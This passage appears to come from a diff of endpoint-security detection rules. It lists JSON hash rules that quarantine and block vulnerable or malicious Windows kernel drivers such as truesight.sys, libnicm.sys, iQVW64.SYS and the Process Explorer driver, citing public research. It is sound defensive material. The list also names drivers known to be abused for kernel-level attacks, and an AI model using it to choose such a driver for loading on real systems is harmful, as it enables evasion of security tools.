+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486694Z",
+ "creation_date": "2026-03-23T11:45:31.486697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486705Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99b45b19810074d650a66ea02e45c47c2d700fecb0af241f17c2a668022fc5bf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0c12e72-aed0-5694-bb56-b983a18e86ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140764Z",
+ "creation_date": "2026-03-23T11:45:31.140766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdfe2efb742559b5ab8c16f8db3cfd184ade59496e50d95bc6c6e12ae1165a83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0c4eebc-415a-5783-ad1e-26e4f2668eaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476769Z",
+ "creation_date": "2026-03-23T11:45:30.476773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ebfc2c2fc43fc34cc98378f627e6147af473cb37076f4c2ba278210bd88b2bf",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0cc75f3-af79-59e6-80e6-43d76c7d0348",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826007Z",
+ "creation_date": "2026-03-23T11:45:31.826009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826015Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6484833b1554e5113239e79a6ea3265863e4a9e03eb3817b6e15c9bd4cfdacc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0d648ed-730b-5b1d-8614-ebe8b7880d39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152443Z",
+ "creation_date": "2026-03-23T11:45:31.152445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c92f5d0513886ce03745e30a704c34a64f3f70cde9d662f0d655143b3086e4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0e3e3d5-051f-56b4-87ad-cc07e4efe3ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144563Z",
+ "creation_date": "2026-03-23T11:45:31.144565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "627ef26e42d9c857196d4028d87ca9f7bdb6e6a034a1e157272556840b7e814c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0e4c212-df36-589d-85de-aba2df9a1aa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146848Z",
+ "creation_date": "2026-03-23T11:45:31.146850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53b09a961939d2aa82a329634552ad47eb39cbf920454987187bc3bbf29f02da",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0ec92f6-8d3a-5d6f-93c4-4bfc618f6f69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146175Z",
+ "creation_date": "2026-03-23T11:45:32.146179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146187Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df72cb33a23ae8f6f9dc64bb738fcfaea959368ce05cf399f3c7db5e90104bd7",
+ "comment": "Malicious Kernel Driver (aka 2.sys) [https://www.loldrivers.io/drivers/bb1f80f3-d2fd-463e-9403-57c919bd976b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0f50ea9-1782-5ece-8698-046bbf53093d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480209Z",
+ "creation_date": "2026-03-23T11:45:30.480211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480217Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a369942ce8d4b70ebf664981e12c736ec980dbe5a74585dd826553c4723b1bce",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0f78f32-f498-5dff-bf1f-0b4a0ce0c17d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150286Z",
+ "creation_date": "2026-03-23T11:45:31.150288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bc0fdb1d47f9a657a3af869fe3cbc6895b118875cc448c4406f9a066c9e610e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0f87ddd-022f-55e1-8b6a-ccb03d2d0266",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160456Z",
+ "creation_date": "2026-03-23T11:45:31.160458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72ca577f73bb6c1c423ca9169850227765f39ae86be8d89d816294b77332079d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0fb0b76-6396-575d-bed7-47a52216575b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830402Z",
+ "creation_date": "2026-03-23T11:45:30.830405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56749ce01bca38992e4f639991a191463712f04a38ed7e92a737f7077c961392",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b10207c7-11e6-54f0-9782-9542eb82bf27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143335Z",
+ "creation_date": "2026-03-23T11:45:32.143338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08209cd92723526d56863e89f283750e2ee57c69db37ae501aa889c0c60bb552",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1153b67-1bd3-53a6-bf61-fc6fce7d604c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828011Z",
+ "creation_date": "2026-03-23T11:45:30.828013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4093dac36e4568b942aa3d409b6b195b98b66f75221cc89ae750f690c901315",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b11f206e-782c-5b2a-9328-a64c163048b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618549Z",
+ "creation_date": "2026-03-23T11:45:29.618551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dde12d20a00f7987f6e53eeeee3d5667482940f06d012a0003b80f217a105d74",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1222eac-a528-527a-bcca-132ebc659adb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830125Z",
+ "creation_date": "2026-03-23T11:45:31.830128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5964196f057eac00f73caccae0f54d34c79f921f9c53070ad6308f9ac035c8e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b1273a07-cd22-52c1-9a81-3507acb2159b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147858Z",
+ "creation_date": "2026-03-23T11:45:31.147860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5747e031599aa68a628608e0a074959a8af6b1f9503bf1dc4a317f95667fa1f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b12ac103-c6ab-5a9c-83a4-a7f8e0c492ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498577Z",
+ "creation_date": "2026-03-23T11:45:31.498580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c51320f954ce1505349fc33e06a5fabcfe3396a9736f79a119199349e99850a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b12b96d9-627f-53b3-ac7e-20a8e13a5bb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979760Z",
+ "creation_date": "2026-03-23T11:45:29.979762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa833c9e3bcdc33eaf64fd913e80f5b9ce60618f6e3ff4c386420fea4a494380",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b12f89c0-92e1-5b90-aeb4-f1f90d3b7c70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605559Z",
+ "creation_date": "2026-03-23T11:45:29.605561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28a1e3627deded98e1620b815422ae15f1dd1d4d643b7b92af97412961791a6a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b137b05b-9361-5a67-9ce5-3503f1a980cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820142Z",
+ "creation_date": "2026-03-23T11:45:30.820144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "047ce557cc7bb580af457c151233b5114de6efbc9bf5e8c919fab453cebe5fa6",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b137bab6-59b2-54b2-b329-f5d07b1b9fc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485257Z",
+ "creation_date": "2026-03-23T11:45:31.485260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485270Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5c412af37fe3f227d6d4288ae4999e14b81fd8a2e6c9705a9d4b025e4652153",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b13e09e5-ff7b-5f77-9484-80c14f927ae4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974987Z",
+ "creation_date": "2026-03-23T11:45:29.974989Z",
+ "enabled": true,
+ "block_on_agent": true,
